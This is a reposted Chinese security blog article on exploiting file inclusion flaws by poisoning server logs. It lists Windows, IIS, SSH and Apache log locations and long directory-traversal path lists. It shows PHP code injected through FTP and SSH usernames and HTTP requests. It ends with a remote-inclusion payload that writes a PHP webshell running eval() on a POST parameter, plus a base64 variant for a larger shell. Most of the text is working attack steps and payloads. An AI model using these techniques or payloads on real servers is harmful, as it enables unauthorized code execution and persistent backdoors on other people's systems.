[聚合文章] LFI漏洞——日志文件分析

  1. 首页
  2. 聚合文章
  3. 文章详情
.Net 2017-12-08 17 阅读
原文链接: http://4hou.win/wordpress/?p=12004

作者:v5est0r

一、应用程序日志、安全日志、系统日志、DNS日志

默认位置:%systemroot%/system32/config,默认文件大小512KB,管理员都会改变这个默认大小。

  • 1、安全日志文件: %systemroot%/system32/config/SecEvent.EVT

  • 2、系统日志文件: %systemroot%/system32/config/SysEvent.EVT

  • 3、应用程序日志文件: %systemroot%/system32/config/AppEvent.EVT

二、Internet信息服务日志

  • 1、IIS的FTP日志默认位置: %systemroot%/system32/logfiles/msftpsvc1/ ,默认每天一个日志(日志文件的名称格式是:ex+年份的末两位数字+月份+日期,如2002年8月10日的WWW日志文件是ex020810.log)

  • 2、WWW日志默认位置: %systemroot%/system32/logfiles/w3svc1/ex170531.log ,默认每天一个日志(日志文件的名称格式是:ex+年份的末两位数字+月份+日期。如2002年8月10日的WWW日志文件是ex020810.log)

ASP文件包含漏洞,遇见的比较少,测试环境是IIS6.0,不能跨目录,不能用绝对路径:

Active Server Pages 错误 'ASP 0131'  <br />不允许的父路径 <br />/lfi.asp,行 6  <br />包含文件 '..\pagerror.gif' 不能用 '..' 表示父目录。<br />

服务器上同时有IIS和Apache的情况就好办了。(如ColdFusion一般满足aspx和php)

C:\Documents and Settings\Administrator>ftp 172.16.12.2<br />Connected to 172.16.12.2.<br />220 Microsoft FTP Service<br />User (172.16.12.2:(none)):<?php phpinfo();?><br />331 Password required for <?php phpinfo();?>.<br />Password:<br />

日志:

10:13:56 172.16.12.3 USER <?php+phpinfo();?> 331 0<br />

➜  ~ ssh '<?php phpinfo();?>'@192.168.1.1<br /><?php phpinfo();?>@192.168.1.1's password: <br />Permission denied, please try again.<br /><?php phpinfo();?>@192.168.1.1<br />

看了下, /var/log/secure 是记录了完整的一句话: 

Jun  8 18:33:43 localhost sshd[28316]: Invalid user <?php phpinfo();?> from 36.149.78.132<br />Jun  8 18:33:43 localhost sshd[28316]: input_userauth_request: invalid user <?php phpinfo();?> [preauth]<br />Jun  8 18:33:50 localhost sshd[28316]: pam_unix(sshd:auth): check pass; user unknown<br />

但是条件比较苛刻:

 -rw-------. 1 root   root    308425 Jun  8 18:49 secure<br />
 http://192.168.199.198/c.php?file=/var/log/auth.log<br />

Jun  8 21:33:46 ubuntu sshd[4625]: Failed password for invalid user <?php phpinfo();?> from 192.168.199.151 port 59879 ssh2<br />Jun  8 21:33:47 ubuntu sshd[4625]: message repeated 2 times: [ Failed password<br />

web容器日志

不仅是IIS,apache、Nginx等web服务都会存储用户访问日志。

 ../../../../../../../../../../var/log/httpd/access_log<br /> ../../../../../../../../../../var/log/httpd/error_log <br /> ../apache/logs/error.log<br /> ../apache/logs/access.log <br /> ../../apache/logs/error.log <br /> ../../apache/logs/access.log<br /> ../../../apache/logs/error.log<br /> ../../../apache/logs/access.log<br /> ../../../../../../../../../../etc/httpd/logs/acces_log<br /> ../../../../../../../../../../etc/httpd/logs/acces.log<br /> ../../../../../../../../../../etc/httpd/logs/error_log<br /> ../../../../../../../../../../etc/httpd/logs/error.log<br /> ../../../../../../../../../../var/www/logs/access_log <br /> ../../../../../../../../../../var/www/logs/access.log <br /> ../../../../../../../../../../usr/local/apache/logs/access_log <br /> ../../../../../../../../../../usr/local/apache/logs/access.log<br /> ../../../../../../../../../../var/log/apache/access_log <br /> ../../../../../../../../../../var/log/apache/access.log <br /> ../../../../../../../../../../var/log/access_log <br /> ../../../../../../../../../../var/www/logs/error_log <br /> ../../../../../../../../../../var/www/logs/error.log <br /> ../../../../../../../../../../usr/local/apache/logs/error_log <br /> ../../../../../../../../../../usr/local/apache/logs/error.log <br /> ../../../../../../../../../../var/log/apache/error_log <br /> ../../../../../../../../../../var/log/apache/error.log <br /> ../../../../../../../../../../var/log/access_log <br /> ../../../../../../../../../../var/log/error_log<br /> /var/log/httpd/access_log     <br /> /var/log/httpd/error_log  <br /> ../apache/logs/error.log   <br /> ../apache/logs/access.log<br /> ../../apache/logs/error.log<br /> ../../apache/logs/access.log<br /> ../../../apache/logs/error.log <br /> ../../../apache/logs/access.log <br /> /etc/httpd/logs/acces_log <br /> /etc/httpd/logs/acces.log <br /> /etc/httpd/logs/error_log <br /> /etc/httpd/logs/error.log <br /> /var/www/logs/access_log <br /> /var/www/logs/access.log <br /> /usr/local/apache/logs/access_log <br /> /usr/local/apache/logs/access.log <br /> /var/log/apache/access_log <br /> /var/log/apache/access.log <br /> /var/log/access_log <br /> /var/www/logs/error_log <br /> /var/www/logs/error.log <br /> /usr/local/apache/logs/error_log <br /> /usr/local/apache/logs/error.log <br /> /var/log/apache/error_log <br /> /var/log/apache/error.log <br /> /var/log/access_log <br /> /var/log/error_log<br />

如此写入我们的代码到日志:

 http://target.com/<?php phpinfo();?><br />

通过浏览器访问会被编码,用Burp Suite发包绕过:

AH00127: Cannot map GET /<?php phpinfo();?>  HTTP/1.1 to file<br /><br />http://172.16.12.2/lfi.php?file=C:\phpStudy\Apache\logs\error.log<br />

远程文件包含就简单了,

 http://192.168.199.198/c.php?file=www.baidu.com/hack.txt<br />

远程txt内容如下:

  <?php fputs(fopen("shell.php","w"),'<?php @eval($_POST["pass"]);?>');?><br />

访问则写出一句话木马到 shell.php ,直接写大马也是可以的: 

 <?php fputs(fopen("shell.php","w"),base64_decode("php大马的base64编码"))?>

注:本文内容来自互联网,旨在为开发者提供分享、交流的平台。如有涉及文章版权等事宜,请你联系站长进行处理。